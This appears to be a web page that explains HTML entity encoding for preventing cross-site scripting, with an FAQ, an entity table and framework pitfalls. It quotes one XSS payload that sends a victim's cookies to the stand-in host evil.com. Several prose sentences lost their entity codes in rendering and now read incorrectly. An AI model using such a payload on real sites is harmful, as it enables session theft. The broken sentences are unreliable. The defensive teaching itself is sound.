When must I HTML-encode user input?

Any time user-controlled data is placed inside HTML element content, attribute values, or JavaScript string literals. Skipping this step enables XSS attacks where attackers inject and execute malicious scripts.

What is the difference between named and numeric HTML entities?

Named entities like & are defined in the HTML specification and are more readable. Numeric entities like & work for any Unicode code point and are supported even by old parsers that do not recognize all named entities.

Do I need to encode inside JavaScript strings in HTML?

Yes, with a different encoding. In JSON/JavaScript contexts, use \u escape sequences or JSON.stringify to escape. Raw HTML encoding inside script tags does not prevent JavaScript injection.

HTML Entity Encoding Examples

HTML entity encoding converts characters that have special meaning in HTML into safe text representations that browsers render as-is without parsing them as markup. The five most critical characters to encode are <, >, &, ", and ' — the raw forms enable Cross-Site Scripting (XSS) attacks when user input is inserted into HTML without escaping. This collection shows the named and numeric entity forms for common symbols and the XSS-sensitive characters. Always HTML-encode user-provided content before inserting it into HTML contexts. XSS (Cross-Site Scripting) is consistently one of the OWASP Top 10 vulnerabilities, and missing HTML encoding is the root cause of reflected and stored XSS attacks. A classic example: if your application displays the search query back to the user as "You searched for: [query]" without encoding, an attacker can craft a URL with query=<script>document.location='https://evil.com/steal?c='+document.cookie</script>. The browser receives this literal string in the HTML response and executes the script, stealing the session cookie. HTML-encoding the output — rendering < as < — turns the script tag into visible text that the browser displays rather than executes. The five XSS-critical entities every developer must know: < for the less-than sign (<), > for the greater-than sign (>), & for the ampersand (&), " for the double quote ("), and ' for the single quote/apostrophe (' — there is no named entity for single quote in HTML4, so the numeric form is used). The ampersand must be encoded first in any multi-step process; encoding < before & can result in < being double-encoded into &lt;. Named entities like ©, ®, and ™ exist for common typographic symbols. These improve HTML source readability and work reliably across all browsers. Numeric entities like © (decimal) or © (hexadecimal) work for any Unicode code point, including characters without named equivalents. Prefer named entities for readability where they exist; use numeric entities for obscure characters. Context matters when choosing what to encode. Inside an HTML attribute value surrounded by double quotes, you must encode " but not '". Inside a CSS style attribute, different characters are dangerous. Inside a JavaScript event handler attribute like onclick="...", you need both HTML encoding and JavaScript string escaping — mixing contexts creates bugs that HTML encoding alone cannot fix. The safest architecture avoids inline JavaScript entirely and uses addEventListener in external scripts. Modern web frameworks handle HTML encoding automatically for template expressions (React's JSX, Angular's {{}} interpolation, Django's {{ variable }}). The risk is bypassing the auto-encoding with raw/unsafe HTML insertion methods: React's dangerouslySetInnerHTML, Angular's [innerHTML] binding, or jQuery's .html() method. These APIs should only be used with content you control, and never with user-supplied data. For rich text editors that must accept user-provided HTML (blog comment boxes, WYSIWYG editors), sanitization libraries like DOMPurify allow-list safe tags and attributes while stripping dangerous ones. Sanitization is more complex than simple encoding and should use a well-tested library rather than a custom regex-based approach.

Example

# XSS-sensitive characters (always encode)
< → &lt;
> → &gt;
& → &amp;
" → &quot;
' → &#39;

# Common symbols
© → &copy;
® → &reg;
™ → &trade;
€ → &euro;
£ → &pound;
— → &mdash;
… → &hellip;
✓ → &#10003;

[ open in HTML Encode → ]

FAQ

When must I HTML-encode user input?: Any time user-controlled data is placed inside HTML element content, attribute values, or JavaScript string literals. Skipping this step enables XSS attacks where attackers inject and execute malicious scripts.
What is the difference between named and numeric HTML entities?: Named entities like & are defined in the HTML specification and are more readable. Numeric entities like & work for any Unicode code point and are supported even by old parsers that do not recognize all named entities.
Do I need to encode inside JavaScript strings in HTML?: Yes, with a different encoding. In JSON/JavaScript contexts, use \u escape sequences or JSON.stringify to escape. Raw HTML encoding inside script tags does not prevent JavaScript injection.

Related Examples

URL-Encode Special Characters

URL percent-encoding (also called URL encoding) is a critical security and corre...

Unicode and Emoji Encoding

Unicode assigns a unique code point (U+XXXX) to every character in every human w...

Inspect a Content Security Policy Header

Content Security Policy (CSP) is the most powerful browser-enforced defense agai...